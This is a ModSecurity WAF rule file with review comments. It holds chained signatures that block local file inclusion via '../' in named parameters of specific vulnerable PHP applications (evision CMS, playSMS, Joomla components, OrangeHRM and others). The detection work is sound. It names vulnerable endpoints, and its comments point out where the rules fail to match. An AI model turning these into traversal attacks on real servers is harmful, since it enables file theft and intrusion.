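SecRule REQUEST_FILENAME "@contains /modules/game/adminpart/addgame.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008854,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File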
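Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected, and the last
# link only counts TX variables whose names match DIR_TRAVERSAL.*ARGS:module -
# presumably set by an earlier traversal rule; verify rule ordering.

# (2008855) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/tour/adminpart/addtour.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008855,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/articles/adminpart/addarticles.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008856,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains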
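/modules/product/adminpart/addproduct.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008857,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# also holds body parameters; the chained checks set no t: actions of their
# own (they run with whatever SecDefaultAction supplies - confirm); and the
# &TX links only count variables presumably set by an earlier traversal rule.

# (2008858) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/plain/adminpart/addplain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008858,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009719,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:templates_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009720) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009720,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /addedit-render.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008992,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32774'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:editform/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009085) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion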
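# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# also holds body parameters, and the chained checks set no t: actions of
# their own (they run with whatever SecDefaultAction supplies - confirm).
SecRule REQUEST_FILENAME "@contains /plugin/gateway/gnokii/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009085,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:apps_path[plug] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion
SecRule REQUEST_FILENAME "@contains /plugin/themes/default/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009087,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:apps_path[themes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009089) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion
SecRule REQUEST_FILENAME "@contains /lib/function.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009089,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule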
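ARGS:apps_path[libs] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# also holds body parameters, and the chained checks set no t: actions of
# their own (they run with whatever SecDefaultAction supplies - confirm).

# (2009320) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion
SecRule REQUEST_FILENAME "@contains /_footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009320,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33621'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:skin_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009331) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion
SecRule REQUEST_FILENAME "@contains /templater.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009331,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30785'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:config[template] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2011573) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plogger phpThumb.php src Parameter Remote File Disclosure Attempt
SecRule REQUEST_FILENAME "@contains /plog-includes/lib/phpthumb/phpThumb.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011573,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Plogger phpThumb.php src Parameter Remote File Disclosure Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:src "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plogger phpThumb.php src Parameter Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2011574) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plogger phpThumb.php w Parameter Remote File Disclosure Attempt
SecRule REQUEST_FILENAME "@contains /plog-includes/lib/phpthumb/phpThumb.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011574,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Plogger phpThumb.php w Parameter Remote File Disclosure Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:w "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plogger phpThumb.php w Parameter Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2011572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plogger phpThumb.php h Parameter Remote File Disclosure Attempt
SecRule REQUEST_FILENAME "@contains /plog-includes/lib/phpthumb/phpThumb.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011572,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Plogger phpThumb.php h Parameter Remote File Disclosure Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:h "@contains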
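../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plogger phpThumb.php h Parameter Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# also holds body parameters, and the chained checks set no t: actions of
# their own (they run with whatever SecDefaultAction supplies - confirm).

# (2011563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt
SecRule REQUEST_FILENAME "@contains /content/dynpage_load.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011563,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2011562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt
SecRule REQUEST_FILENAME "@contains /oldnews_reader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011562,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2011554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt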
# Review notes for rule 2011554 (they apply equally to 2011385 below):
# - Four-part chain: the starter and every chained SecRule must all match
#   before the rule's actions run. The starter carries phase:2, block,
#   severity:'2' and the rule id.
# - t:urlDecodeUni, t:htmlEntityDecode and t:normalisePathWin are listed only
#   on the chain starter; the chained checks list no t: actions.
#   NOTE(review): confirm which transformations the chained ARGS:controller
#   test actually receives in this deployment (for example from
#   SecDefaultAction), so that "@contains ../" sees the decoded, normalised
#   value that was intended.
# - "@contains GET " is a substring test on REQUEST_LINE, so the signature is
#   scoped to requests whose request line contains "GET ".
#   NOTE(review): REQUEST_METHOD with @streq would state that scope exactly;
#   requests using other methods are left to the generic traversal rules, so
#   confirm those are enabled.
# - On a match, ctl:auditLogParts=+E adds audit-log part E for the
#   transaction, tx.anomaly_score is raised by tx.critical_anomaly_score, and
#   the matched variable name and value are stored in a TX variable.
#   NOTE(review): the audit log then holds request-supplied values (and, if
#   part E is the response body, possibly returned file content) - keep it
#   access-restricted.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011554,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_jphone" "chain"
    SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2011385) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt
# Same chain shape as 2011554, keyed on option=com_noticeboard in the request
# line; the review notes above apply unchanged.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011385,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_noticeboard" "chain"
    SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2011453) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /maincore.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011453,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local
File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:folder_level "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /section.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011828,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Module "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011829) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1) SecRule REQUEST_LINE "@contains /classes/flash_mp3_player/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011829,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1)',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion 
Attempt(1)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2011830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)
# Three-part chain: path substring on REQUEST_LINE, then "GET ", then
# ARGS:file containing ../ . The t: transformations appear only on the
# starter. NOTE(review): confirm the chained ARGS:file test is evaluated with
# the decoding/normalisation that was intended.
SecRule REQUEST_LINE "@contains /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011830,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2011843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt
# Same three-part shape as 2011830, testing ARGS:filepath.
SecRule REQUEST_LINE "@contains /baconmap/admin/updatelist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011843,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:filepath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2011846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt
# Five-part chain: the request line must contain /index.php, "GET ",
# uniqcode=KPI and menu_no_top=performance before ARGS:uri is tested for ../ .
# NOTE(review): the two parameter tests are literal substrings of
# REQUEST_LINE with no t: action of their own; confirm they still match when
# those parameters arrive percent-encoded.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011846,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains uniqcode=KPI" "chain"
    SecRule REQUEST_LINE "@contains menu_no_top=performance" "chain"
    SecRule ARGS:uri "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2011853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt
# Unlike its neighbours, the last link of this chain does not inspect the
# argument itself: &TX:'/DIR_TRAVERSAL.*ARGS:bn/' counts TX variables whose
# name matches that regex and requires the count to be greater than 0.
# NOTE(review): presumably those TX variables are set by the generic
# directory-traversal rules; if those rules are disabled, loaded after this
# file, or name their TX variables differently, this signature stays silent.
# Verify the include order and add a regression test.
# NOTE(review): the path test is /news/search.php3 while msg says search.php;
# confirm against the upstream signature.
SecRule REQUEST_LINE "@contains /news/search.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011853,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,44370'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:bn/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2011882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt
# The chain for 2011882 continues past the two directives shown here.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011882,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
